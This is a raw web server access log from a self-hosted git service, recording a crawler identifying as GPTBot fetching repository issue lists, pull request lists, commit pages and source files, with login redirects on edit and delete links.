(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:18:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:18:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 10321] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:18:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 42995] [Gzip 22.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:18:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 45869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:18:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 2038] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:18:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13311] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=all&type=all" -[17/Feb/2026:18:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 70570] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:18:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:18:35:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:18:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:18:35:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:18:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:18:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2f__pycache__%2fui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 20816] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" -[17/Feb/2026:18:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" -[17/Feb/2026:18:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=open&type=all" -[17/Feb/2026:18:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15662] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15660] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py?display=rendered" [Client 74.7.227.38] [Length 11171] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" -[17/Feb/2026:18:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py?display=source" [Client 74.7.227.38] [Length 14521] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" -[17/Feb/2026:18:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=closed&type=all" -[17/Feb/2026:18:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec?display=rendered" [Client 74.7.227.38] [Length 11124] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:18:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:18:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:18:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10139] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:18:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:18:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=closed&type=all" 